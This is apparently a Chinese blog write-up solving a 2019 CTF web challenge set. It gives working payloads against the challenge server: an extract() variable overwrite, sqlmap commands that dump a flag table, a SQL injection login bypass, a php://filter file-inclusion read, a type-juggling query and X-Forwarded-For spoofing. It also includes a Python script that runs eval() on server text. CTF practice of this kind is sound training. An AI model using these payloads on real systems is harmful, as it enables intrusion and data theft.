20190423 CTF题-web

最新推荐文章于 2024-05-15 02:47:28 发布
最新推荐文章于 2024-05-15 02:47:28 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: ★ CTF # ——【 SQL Inject】 # ——【 Code Audit】 # ——【 FileUpload/FileInclude】
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dyw_666666/article/details/89465225
版权

签到题(代码审计-extract变量覆盖)

WEB1(SQL注入)

WEB2(万能语句登陆框)

WEB3(文件包含+php伪协议)

WEB4(脚本题)

WEB5(md5验证)

vim编辑器(备份文件+代码审计)

WEB7(伪造ip)

签到题(代码审计-extract变量覆盖)

很明显是一道关于extract变量覆盖的代码审计题。

需要满足下面两个条件:

  1. 利用extract传入空值覆盖$b和$a的值
  2. 还要满足$a==$c

Payload:

http://123.206.31.85:10001/?b=&a=

得到flag。

WEB1(SQL注入)

看到留言本很自然就想到SQL注入。

抓包保存为txt文件,sqlmap跑:

sqlmap.py -r 1.txt --current-db


sqlmap.py -r 1.txt -D web5 --tables

 sqlmap.py -r 1.txt -D web5 -T flag --dump

 

WEB2(万能语句登陆框)

一看就知道是sql注入题,用户名构造万能密码:'or '1' = '1' #   密码任意  得到flag。

WEB3(文件包含+php伪协议)

刚开始看到这道题的时候还以为是文件上传,但其实是考察文件包含漏洞+php伪协议

从url的 ?op=upload 其实就可以猜测出,只是把原本的file替换成了op。

 

Payload:

http://123.206.31.85:10003/?op=php://filter/read=convert.base64-encode/resource=flag

base64解码:

得到flag。

WEB4(脚本题)

说到快就得写脚本了。

# -*- coding:utf-8 -*-
import requests
import re

url = "http://123.206.31.85:10002/index.php"
session = requests.session()
r = session.post(url)
html = r.text
key = re.findall('(.*)</p>', html)
for i in key:
    r2 = session.post('http://123.206.31.85:10002/index.php',data ={'result':eval(i)})
    print(r2.text)

运行得到flag。

 

WEB5(md5验证)

根据页面title提示robots,访问robots.txt

访问shell.php

<?php
$a = 0;
for($a; $a<100000000; $a++){
	if(substr(md5($a),0,6) == '52aa16'){
		echo $a;
		exit();
	}
}
?>

执行后得到9288。

得到flag。

vim编辑器(备份文件+代码审计)

根据提示,观察url发现这是1ndex.php,而不是index.php。

抓包,修改为index.php,发现302跳转:

根据这道题的名字猜测,既然是用vim写的或许会有临时文件,果然在index.php~找到了。

<?php
header('content-type:text/html;charset=utf-8');
include './flag.php';
error_reporting(0);
if(empty($_GET['id'])){
    header('location:./1ndex.php');
}else{
	$id = $_GET['id'];
	if (!is_numeric($id)) {
		$id = intval($id);
		switch ($id) {
			case $id>=0:
				echo "快出去吧,走错路了~~~<br>";
				echo "这么简单都不会么?";
				break;
			case $id>=10:
				exit($flag);
				break;
			default:
				echo "你走不到这一步的!";
				break;
		}
	}
}
?>

代码审计。

Payload:

http://123.206.31.85:10015/index.php?id="10a"

 

WEB7(伪造ip)

进到页面后,查看一下源码。

结果找到这个:

base64解码后:

test123

尝试登陆,提示ip禁止访问:

猜测有可能需要本地访问,因此用火狐的 X-Forwarded-For Header插件 伪造127.0.0.1。

得到flag。

烟敛寒林o
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【Writeup】第六季极客大挑战(部分目)
企鹅学coding~
10-31 6821
好久没做CTF了,一是感觉前几次网赛被虐的够呛,二是各种杂事也越来越多。偶然看到了网上这套成都信息工程大学的练习,感觉难度上比较适合我这种菜鸟,于是抽空做了一些,然而由于水平和时间原因最终也才完成11/41,这里就记录一下我解出的11道。以及将来学会的,也会在后面增加。
CTF-AWD-WEB:AWD 模式下的WEB试仓库
05-17
这个资源库"CTF-AWD-WEB-master"提供的试将帮助参与者提升他们的实战技能,深入理解Web安全攻防的原理,并能够在实际环境中应用这些知识。通过解,不仅可以锻炼漏洞挖掘和修复能力,还可以提升安全意识,对于...
CTFHub技能书解笔记-RCE-读取源代码
qq_43006864的博客
03-30 1543
打开目,读取源代码。直接开整。 目界面就是源代码。和上一道一样,但是代码有所变化。 if ( substr($_GET["file"], 0, 6) === "php://" ) #返回file里面第0个到第6个字符,且要等于 php:// 。 那既然要等于php://,就和上一样,试试php://input 芜湖了,好像没用。这里的input是不起作用,看大佬说是allow_url_fopen没有开启。 目要求又必须使用php://。而且flag就在/flag里。 这里引...
Oracle中的substr()函数 详解及应用
MINGDE_SKILL的博客
10-11 1884
1、substr函数格式 (俗称:字符截取函数)   格式1: substr(string string, int a, int b);   格式2:substr(string string, int a) ; 解释: 格式1: 1、string 需要截取的字符串 2、a 截取字符串的开始位置(注:当a等于0或1时,都是从第一位开始截取) ...
网络安全最新CTF目合集_网络安全ctf大赛库(1),2024年最新网络安全高级面试2024
最新发布
2301_82257383的博客
05-15 1259
carrayjsondecodecm]):使用isnumeric函数检查数组d===false?
substr函数的使用
热门推荐
许大头博客
08-30 13万+
1、substr函数格式 (俗称:字符截取函数)   格式1: substr(string string, int a, int b);   格式2:substr(string string, int a) ; 解释: 格式1: 1、string 需要截取的字符串 2、a 截取字符串的开始位置(注:当a等于0或1时,都是从第一位开始截取) 3、b 要截取的字符串的长度...
ctf此php是用vim编辑的,CTF实验吧-忘记密码了【vim编辑器备份文件】
weixin_33979216的博客
03-11 1327
内容:找回密码格式:SimCTF{ }解链接:http://ctf5.shiyanbar.com/10/upload/(略过查看源代码等最基本的步骤)首先首页让你输入注册邮箱找回密码,尝试admin,有弹窗显示消息: 复制提示信息至地址栏:发现可以看到step2的内容然后瞬间变成step1内容,打开bp准备逐步查看,获取step2页面内容: 代码中被选中的这一行很有意思,告诉了你编辑器是v...
bugkuctf-WEB
05-04
CTF(Capture The Flag)比赛中,Web安全领域是一个重要的环节,它涵盖了各种网络安全技能,如漏洞挖掘、代码审计、Web应用渗透测试等。本文主要针对"bugkuctf-WEB"这一主,结合描述中的CTF菜鸟的解经验...
ctfctf-pwn赛收集
03-31
CTF库通常由多个类别的挑战组成,例如Web安全、二进制反汇编、密码学、隐写术等。每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
CTF库超详细资源合集
06-14
在传统的CTF线上⽐赛中,Web类⽬是主要的型之⼀,相较于⼆进制、逆向等类型的⽬,参赛者不需掌握系统底层知识;相较于密码学、杂项问,不需具特别强的编程能⼒,故⼊门较为容易。Web类⽬常见的漏洞类型...
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出人申请重新对过渡进行修改发布的权利,但对每个均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 对已提供Dockerfile...
目2-3-粗心的小明
博客地址 www.sec0nd.top
07-26 608
考查点:bak备份文件 打开正常页面显示flag is not here! 查看源代码也未发现flag 用扫描工具扫描后,发现存在index.php.bak备份文件 查看源代码发现flag
CTF学习日记(2)
NUC_zlt的博客
11-01 1243
CTF学习日记第二次总结
Ctfshow web入门 代码审计篇 web301-web310 详细解 全
Jay17的博客
09-21 1606
Ctfshow web入门 代码审计篇 web301-web310 详细解 全
ctf_web入门审计
B_cecretary的博客
11-02 1110
记录个人学习过程的笔记
CTF-Web25(涉及简单的PHP代码审计-基础
→_→
09-28 829
25.PHP大法 分析: PHP函数: eregi()函数 —— 不区分大小写的检查一个字符串里是否包含另外一个字符串;可以使用%00截断绕过,匹配数组的话会返回NULL(与本无关),跟ereg()功能类似; <?php if(eregi("hackerDJ",$_GET[id])) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($_GET[id]); if($.
PolarCTF WEB目 代码审计1WP
weixin_62257805的博客
10-13 256
PolarCTF WEB目 代码审计1WP
CTFWeb-BUUCTF竞赛真WriteUp(1)_ctf no0b
yy1715713348的博客
03-15 1252
BUUCTF (北京联合大学CTF)平台拥有大量免费的 CTF 比赛真环境:此处记录下部分 Web 目练习过程。
ctfshow-web-web红包
07-14
ctfshow-web-web红包是一道CTF比赛中的网络安全目。这道目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

烟敛寒林o

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值